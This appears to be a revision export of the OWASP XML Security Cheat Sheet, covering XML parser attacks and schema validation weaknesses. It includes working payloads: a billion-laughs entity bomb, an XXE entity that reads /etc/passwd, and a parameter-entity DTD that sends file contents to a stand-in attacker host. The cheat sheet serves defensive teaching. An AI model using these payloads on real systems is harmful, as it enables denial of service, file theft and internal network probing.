 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 references to &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt; that it contains; then each of these will be resolved as 10 references to &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt;, and so on. Finally, the CPU and/or memory will be affected by expanding the resulting 10^9 (1,000,000,000) copies of the string &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, about 3*10^9 characters in total, which could make the parser crash.&lt;br /&gt;
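&lt;br /&gt;
The size of the expansion follows from the nesting depth and the number of references per entity. The Python sketch below is only an estimate; the function name &amp;lt;tt&amp;gt;expansion&amp;lt;/tt&amp;gt; and its parameters are hypothetical and chosen for illustration.&lt;br /&gt;

```python
def expansion(levels, fanout, base_text):
    """Return (copies, characters) after fully expanding nested entities.

    levels: number of entities that each reference the previous one
    fanout: number of references inside each entity definition
    base_text: replacement text of the innermost entity
    """
    copies = fanout ** levels
    return copies, copies * len(base_text)


# Nine levels (LOL1 to LOL9), ten references each, innermost text LOL.
copies, characters = expansion(levels=9, fanout=10, base_text="LOL")
print(f"{copies:,} copies, {characters:,} characters")
```

Each extra nesting level multiplies the result by the fan-out, so a document of under one kilobyte is enough to exhaust memory on a parser that does not limit entity expansion.&lt;br /&gt;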
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser does not follow the specification and accepts a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; xmlns:SOAP=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt;&lt;br /&gt;
    &amp;lt;KEYWORD xmlns=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an external entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt; whose replacement text is the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, and which is expanded inside the &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; element. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes it retrieve remote resources, such as a file served over HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file contents cannot be reflected back, to perform port scanning, and to perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information that a port scan through XXE returns depends on the implementation. Responses can be classified as follows, ranked from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario. With complete disclosure, you can clearly see what is going on because you receive the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the response time when connecting to a valid port will be very quick (one second, for example). The differences between open and closed ports become quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host, then analyze the average time for each port to determine its status. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
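&lt;br /&gt;
The averaging step can be sketched in Python as follows. This is a minimal illustration over made-up numbers: the function name &amp;lt;tt&amp;gt;classify_ports&amp;lt;/tt&amp;gt;, the threshold, and the sample timings are all hypothetical, and the assumption that slower responses mean a closed port depends on the implementation being tested.&lt;br /&gt;

```python
from statistics import mean


def classify_ports(samples, threshold_seconds):
    """Label each port by comparing its mean response time to a threshold.

    samples: mapping of port number to a list of measured times in seconds
    threshold_seconds: assumed cut-off between fast and slow responses
    This sketch assumes that closed ports answer more slowly than open ones.
    """
    result = {}
    for port, times in samples.items():
        average = mean(times)
        result[port] = "closed" if average >= threshold_seconds else "open"
    return result


# Hypothetical measurements, not taken from a real system.
measurements = {
    80: [0.012, 0.011, 0.013],
    8080: [0.019, 0.021, 0.020],
}
print(classify_ports(measurements, threshold_seconds=0.015))
```

Taking more samples per port reduces the effect of network jitter, which is the reason high latency networks make this classification unreliable.&lt;br /&gt;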
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; in the user information part of the URI. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
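&lt;br /&gt;
To make the structure of such a URI explicit, the following Python sketch splits the example with the standard library function &amp;lt;tt&amp;gt;urllib.parse.urlsplit&amp;lt;/tt&amp;gt;. It only parses the string and does not open any connection.&lt;br /&gt;

```python
from urllib.parse import urlsplit

# The credentials travel in the part of the URI that precedes the host.
parts = urlsplit("foo://username:password@example.com:8080/")

print("scheme:", parts.scheme)
print("username:", parts.username)
print("password:", parts.password)
print("host:", parts.hostname)
print("port:", parts.port)
```

A filter that inspects entity URLs can use the same parsing step to reject any system identifier that carries credentials.&lt;br /&gt;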
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224418</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224418"/>
				<updated>2016-12-21T19:43:28Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using documents that are not well formed.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;!-- one&lt;br /&gt;
    &amp;lt;!-- another comment&lt;br /&gt;
  comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though it is not required:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt; &lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up, and eventually deplete, the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
     ...&lt;br /&gt;
      &amp;lt;A30000&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;123&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to open a new, empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
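&lt;br /&gt;
The effect of reading only the first matching element can be reproduced with Python's standard &amp;lt;tt&amp;gt;xml.etree.ElementTree&amp;lt;/tt&amp;gt; module. The sketch below rebuilds the tampered message through the API; the helper names &amp;lt;tt&amp;gt;first_price&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;has_expected_structure&amp;lt;/tt&amp;gt; are hypothetical, and the structural check is a simplified stand-in for real schema validation.&lt;br /&gt;

```python
import xml.etree.ElementTree as ET

# Rebuild the tampered message: id, injected price, empty id, real price.
buy = ET.Element("buy")
for tag, text in [("id", "123"), ("price", "0"), ("id", None), ("price", "10")]:
    ET.SubElement(buy, tag).text = text


def first_price(element):
    """Naive lookup: returns the first price child, which the attacker injected."""
    return element.findtext("price")


def has_expected_structure(element):
    """Strict check: exactly one id followed by exactly one price."""
    return [child.tag for child in element] == ["id", "price"]


print("price used by naive code:", first_price(buy))
print("structure accepted:", has_expected_structure(buy))
```

The naive lookup returns the injected value 0, while the structural check rejects the message before any value is read.&lt;br /&gt;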
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it offers a very limited set of restrictions compared to those that XML Schema can apply to XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;11111..(1,000,000 digits)..11111&amp;lt;/age&amp;gt;&lt;br /&gt;
&amp;lt;/person&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
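&lt;br /&gt;
When the schema language cannot express such limits, the application has to enforce them itself. The following Python sketch shows one way to do so; the policy of an optional sign followed by one to three digits is an assumption made for illustration, as are the names &amp;lt;tt&amp;gt;AGE_PATTERN&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;is_valid_age&amp;lt;/tt&amp;gt;.&lt;br /&gt;

```python
import re

# Assumed policy: optional sign followed by one to three digits.
AGE_PATTERN = re.compile(r"[+-]?[0-9]{1,3}")


def is_valid_age(text):
    """Return True only when the whole string matches the assumed policy."""
    return AGE_PATTERN.fullmatch(text) is not None


print(is_valid_age("42"))
print(is_valid_age("1" * 1_000_000))
print(is_valid_age("12 years"))
```

Using a full match rather than a prefix match matters here, because a prefix match would accept the one-million-digit value after reading its first three digits.&lt;br /&gt;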
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element name='CipherData' type='xenc:CipherDataType'/&amp;gt;&lt;br /&gt;
&amp;lt;complexType name='CipherDataType'&amp;gt;&lt;br /&gt;
  &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name='CipherValue' type='base64Binary'/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref='xenc:CipherReference'/&amp;gt;&lt;br /&gt;
  &amp;lt;/choice&amp;gt;&lt;br /&gt;
&amp;lt;/complexType&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value and still considered the element valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema.&lt;br /&gt;
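&lt;br /&gt;
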